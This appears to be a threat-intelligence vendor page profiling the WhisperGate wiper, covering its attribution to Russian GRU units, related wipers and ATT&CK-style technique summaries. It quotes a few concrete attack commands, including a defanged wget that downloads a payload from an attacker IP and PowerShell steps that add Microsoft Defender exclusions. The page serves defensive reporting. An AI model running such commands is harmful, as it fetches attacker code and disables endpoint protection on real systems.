WhisperGate is a destructive Windows malware family used against Ukrainian government and related organizations in early 2022, immediately preceding and coinciding with Russia’s invasion of Ukraine. It is widely characterized as a wiper rather than true ransomware: although it displayed an extortion demand, its purpose was data destruction and system sabotage. Reported behavior includes overwriting the master boot record and deploying additional destructive components to render systems inoperable. The malware has been associated in public government attributions with Russian military intelligence activity, particularly GRU Unit 29155, while some reporting also references Sandworm in broader discussions of destructive operations against Ukraine.
WhisperGate combined psychological impact with technical disruption. It was used in campaigns affecting Ukrainian government systems and has been described as part of a broader wave of Russia-linked wiper activity targeting Ukraine alongside families such as HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero. Public reporting states that more than 70 Ukrainian government systems were affected in the 2022 operation.
Beyond destructive functionality, WhisperGate exhibited limited post-compromise and evasion features. Reported capabilities include checking for monitoring or security tools on infected hosts, using PowerShell to support execution and defense evasion, establishing HTTPS connections to download additional files, and downloading a legitimate administration utility to disable Microsoft Defender protections and add exclusions. These behaviors indicate that, while primarily a wiper, WhisperGate incorporated enough auxiliary functionality to improve execution reliability and reduce defensive interference on targeted Windows systems.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Sandworm (GRU Unit 74455) известен деструктивными атаками ... и вайпером WhisperGate.
its deployment of the WhisperGate wiper malware against Ukrainian government systems in 2022 marked a significant shift
NSA, FBI, CISA, and allies assessed that Unit 29155 has conducted malicious cyber activity for espionage, sabotage, and reputational harm since at least 2020, deployed WhisperGate against Ukrainian victim organizations as early as January 2022...
Unit 29155 ... has been carrying out destructive attacks, such as WhisperGate, which involved a wiper malware used against Ukraine in February 2022
Microsoft reported that it had found destructive malware, dubbed WhisperGate... CERT-UA published a report showing code similarity between WhisperKill (the file wiper used during the WhisperGate campaign) and WhiteBlackCrypt
21 distinct techniques documented for this family, organized by ATT&CK tactic.
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content is a long ATT&CK-style listing of malware and threat actors that collect host details such as OS version, hostname, architecture, CPU, memory, BIOS, language, and other basic system characteristics; examples include use of commands like systeminfo, ver, uname, sw_vers, and WMI queries.
Multiple entries describe enumerating local, logical, or physical drives and disk/volume information, e.g., 'can enumerate local drives,' 'GetLogicalDrives,' 'fsutil fsinfo drives,' 'list drives,' and 'discover logical drive information including the drive type, free space, and volume information.'
The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."
Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.
its deployment of the WhisperGate wiper malware against Ukrainian government systems in 2022 marked a significant shift... WhisperGate is a wiper malware designed to erase data and sabotage critical systems
Following the invasion, Russian operators repeatedly deployed new wipers and ransomware variants against Ukrainian government and private-sector organizations.
"Play has used Base64-encoded PowerShell scripts to disable Microsoft Defender," "StrongPity can use PowerShell to add files to the Windows Defender exclusions list," and "ZeroCleare can use a malicious PowerShell script to bypass Windows controls."
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities... killing security software processes or services, modifying / deleting Registry keys or configuration files... Adversaries may also disable updates...
BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'
87 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Wiper malware referenced as part of destructive Sandworm operations.
Destructive malware used alongside website defacements to degrade Ukrainian government systems during pre-invasion coercion.
Referenced as historical comparison for destructive malware focused on immediate operational impact.
Malware used in a campaign targeting Ukrainian critical infrastructure; described here as part of GRU-linked activity and notable for including a cryptocurrency extortion demand.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.